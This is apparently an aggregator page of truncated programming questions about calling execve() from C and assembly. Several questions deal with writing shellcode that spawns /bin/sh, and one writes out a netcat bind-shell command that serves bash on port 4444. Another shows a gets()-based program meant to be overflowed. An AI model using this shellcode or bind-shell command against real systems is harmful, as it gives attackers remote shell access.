execve

execve() failing to launch program in C

ぃ、小莉子 submitted on 2021-02-19 06:16:08
Question: I am trying to spawn a new process using execve() from unistd.h on Linux. I have tried passing it the following parameters execve("/bin/ls", "/bin/ls", NULL); but get no result. I do not get an error either, the program just exits. Is there a reason why this is happening? I have tried launching it as root and regular user. The reason I need to use execve() is because I am trying to get it to work in an assembly call like so program: db "/bin/ls",0 mov eax, 0xb mov ebx, program mov ecx,

execve() failing to launch program in C

余生颓废 submitted on 2021-02-19 06:15:40
Question: I am trying to spawn a new process using execve() from unistd.h on Linux. I have tried passing it the following parameters execve("/bin/ls", "/bin/ls", NULL); but get no result. I do not get an error either, the program just exits. Is there a reason why this is happening? I have tried launching it as root and regular user. The reason I need to use execve() is because I am trying to get it to work in an assembly call like so program: db "/bin/ls",0 mov eax, 0xb mov ebx, program mov ecx,

Pointer to string in stand-alone binary code without .data section

别来无恙 submitted on 2021-02-04 19:43:06
Question: I'm trying to write a kind of exploit and have a problem with making my asm code run anywhere on the stack. Here it is: BITS 64 global _start _start: mov rax, 59 jmp short file c1: pop rdi jmp short argv c2: pop rsi mov rdx, 0 syscall ret file: call c1 db '/bin/sh',0 argv: call c2 dq arg, 0 <- problem arg: db 'sh',0 This code won't work anywhere on the stack due to the selected line because this code can be executed anywhere on the stack so nasm can't correctly compute arg's address. (This is a

execve() argv in GAS AT&T assembler

故事扮演 submitted on 2021-01-27 14:40:43
Question: My code: .section .data name: .string "/bin/sh" args: .string "-c" .string "ls" .section .text .globl _start _start: pushq $0 pushq name movq $59, %rax movq %rsp, %rdi pushq $0 pushq args movq %rsp, %rsi movq $0, %rdx syscall I know that the second argument of execve is an array of chars. How to do this in assembly avoiding this: execve("./payload", ["./payload"], 0x7ffc291fd160 /* 40 vars */) = 0 execve("/bin/sh", [0x736c00632d], NULL) = -1 EFAULT (Bad address) --- SIGSEGV {si_signo=SIGSEGV, si

Where do I find the assembly that creates a static variable in the .data section of my C program?

删除回忆录丶 submitted on 2020-11-28 01:41:44
Question: First time poster. 2nd year CS student. I am exploring the creation of static variables in the .data section of the Virtual Address Space in the context of a C source->GCC compilation->Linux execution environment. C program is test.c int main() { register int i = 0; register int sum = 0; static int staticVar[10] = {1,2,3,4,5,6,7,8,9,-1}; Loop: sum = sum + staticVar[i]; //optimized away i = i+1; if(i != 10) goto Loop; return 0; } Asking GDB to 'disass /m' reveals that there is no code for

What is proper way to call execve with arguments in assembly?

穿精又带淫゛_ submitted on 2020-01-24 11:17:50
Question: I am trying to execute the following with execve: /bin//nc -lnke /bin/bash -p 4444 When reading the man page for execve, I see the following requirements: int execve(const char *filename, char *const argv[], char *const envp[]); The issue I am running into is pushing arguments to argv; I do not understand how you push an array (in assembly) for this to work properly. The assembly that I am currently using is below: global _start _start: xor eax, eax ; command push eax push 0x636e2f2f push

What is proper way to call execve with arguments in assembly?

安稳与你 submitted on 2020-01-24 11:17:30
Question: I am trying to execute the following with execve: /bin//nc -lnke /bin/bash -p 4444 When reading the man page for execve, I see the following requirements: int execve(const char *filename, char *const argv[], char *const envp[]); The issue I am running into is pushing arguments to argv; I do not understand how you push an array (in assembly) for this to work properly. The assembly that I am currently using is below: global _start _start: xor eax, eax ; command push eax push 0x636e2f2f push

execve("/bin/sh", 0, 0); in a pipe

折月煮酒 submitted on 2019-12-21 03:58:15
Question: I have the following example program: #include <stdio.h> int main(int argc, char ** argv){ char buf[100]; printf("Please enter your name: "); fflush(stdout); gets(buf); printf("Hello \"%s\"\n", buf); execve("/bin/sh", 0, 0); } When I run without any pipe it works as it should and returns a sh prompt: bash$ ./a.out Please enter your name: warning: this program uses gets() which is unsafe. testName Hello "testName" $ exit bash$ But this does not work in a pipe, I think I know why that is,

execve shellcode writing segmentation fault

断了今生、忘了曾经 submitted on 2019-12-17 04:07:20
Question: I am trying to study execve shellcode, OS : Linux bt 2.6.39.4 root@bt:~/exploit# cat gshell.s .globl _start _start: nop jmp MyString shell: popl %esi xorl %eax,%eax movl %al,9(%esi) movl %esi,10(%esi) movl %eax,14(%esi) movb $11,%al movl %esi, %ebx leal 0xa(%esi),%ecx leal 0xe(%esi),%edx int $0x80 movl $1,%eax movl $0,%ebx int $0x80 MyString: call shell shellvar: .ascii "/bin/bashADDDDCCCC" root@bt:~/exploit# as -gstabs -o gshell.o gshell.s root@bt:~/exploit# ld -o gshell gshell.o root@bt:~

Shellcode: perform 2 execve() calls

独自空忆成欢 submitted on 2019-12-12 21:21:54
Question: I am trying to write shellcode in assembly. I need to perform a /usr/bin/killall command AND a /usr/bin/wget command. I have both commands running perfectly in shellcode with the execve() syscall. But now I want to combine these 2, but this is not possible because the program exits when the first execve() call is executed. (from the man pages of execve(): execve() does not return on success). How can I perform 2 execve() calls? Or is there another way to call both /usr/bin/killall and /usr